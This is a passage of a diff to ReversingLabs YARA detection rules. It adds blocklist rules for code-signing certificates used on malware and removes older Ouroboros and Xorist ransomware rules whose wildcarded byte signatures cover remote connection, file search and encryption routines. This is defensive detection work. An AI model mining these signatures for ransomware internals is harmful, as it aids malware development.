and 1572307200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12876-L12892" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Blist LLC" and pe.signatures[i].serial=="2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE { meta: - description = "Yara rule that detects Ouroboros ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "af0b9311-a7dd-56e8-a004-0828af5af5ef" - date = "2020-07-15" - modified = "2020-07-15" + id = "d4499a1d-aa8d-5056-ad91-439f27f00c33" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12894-L12910" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ouroboros" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? - 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? - ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - } - $remote_connection_p2 = { - C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 - ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B - 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? - ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? - ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? - 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 - } - $remote_connection_p3 = { - F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF - 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? - ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 - FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 - ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A - ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? - ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 - ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ?? - ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F - 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection_p4 = { - 8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? - ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF - 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 - ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 - 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA - ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? - ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? - 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F - 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? E8 - } - $find_files = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? - 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? - ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? - 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 - 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 - 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 - F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? - ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 - FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? - 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 - 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B - C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 - ?? E9 - } - $encrypt_files_p1 = { - 83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ?? - 8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B - C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ?? - 81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8 - 76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7 - D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8 - ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ?? - ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ?? - 83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC - CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ?? - 3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D - } - $encrypt_files_p2 = { - 89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E - 5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ?? - ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE - ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 - 51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50 - 89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07 - 8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8 - ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ?? - 23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ?? - ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C - 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E - } - $encrypt_files_angus_version = { - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 - 8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? - ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? - ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C4DL Media" and pe.signatures[i].serial=="68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "6839595d-b645-5963-bd96-a668bfdd667f" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12912-L12928" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and (( all of ($encrypt_files_p*)) or ($encrypt_files_angus_version)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"SMART GREY\" LLC" and pe.signatures[i].serial=="3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE { meta: - description = "Yara rule that detects Xorist ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "804ae039-fc3b-5f19-860e-df9efe87ee4d" - date = "2020-07-15" - modified = "2020-07-15" + id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12930-L12946" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Xorist" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_and_encrypt_v1_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F - 84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 - } - $search_and_encrypt_v1_p2 = { - 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? - E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF - } - $search_and_encrypt_v1_p3 = { - 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A - ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 - ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80 - 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? - ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? 